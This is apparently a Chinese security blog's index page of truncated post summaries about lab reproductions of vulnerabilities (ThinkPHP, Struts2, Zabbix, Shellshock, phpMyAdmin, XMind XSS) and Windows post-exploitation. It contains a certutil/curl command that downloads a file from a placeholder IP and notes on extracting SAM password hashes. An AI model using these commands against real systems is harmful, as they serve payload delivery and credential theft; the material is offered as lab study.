摘要:
方法一: certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip c:\test.zip (windows远程下载文件至本地,仅需要一个cmd执行的地方) 方法二: curl http://xx.xx.xx.xx/test.zip -o c: 阅读全文
摘要:
一、sam特征 (1)全称: security account manager (2)存储位置: C:\windows\system32\config\SAM (3)一旦创建,即产生,一旦销毁,即消失,即使账号重复也将重新生成新的hash 二、提取sam密码 法一:提取命令:(win2K可以直接使用 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 0x01 影响版本 官网windows最新版本:XMind-2020-for-Windows-64bit-10.3.1-202101070032 0x02 漏洞复现 (1)安装Xmind后,新建一个思维导图,然后点击大纲: (2)尝试XSS语句测试paylo 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:phpmyadmin 版本:php版本:4.3.0 ~5.4.6 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:/index.php 版本:thinkphp5.0~thinkphp5.0.23 0x02 漏洞复现 注:复现是比较简单的,原理需要自己去深入剖析 (1) 阅读全文
摘要:
0x00 实验环境 主机:Win 10 编辑器:SublimeText 0x01 编译环境 php 0x02 运行指南 (1)点击“工具”——>“编译系统”——>“新建编译系统” (2)修改以下环境(目录需要是你自己的php.exe所在的目录),然后保存为php.sublime-build即可 { 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:/index.php 版本:thinkphp2.x 简介:在ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:/index.action 版本:struts 2.0.0 - struts 2.5.25 简介:Apache Struts2框架是一个用于开发Java 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 影响版本:Zabbix 3.0.x~3.0.30 漏洞简介: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 za 阅读全文
摘要:
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 标志:Bash<=4.3;8080端口,存在victim.cgi文件 shelshocke简介: shellshock即unix 系统下的bash shell的 阅读全文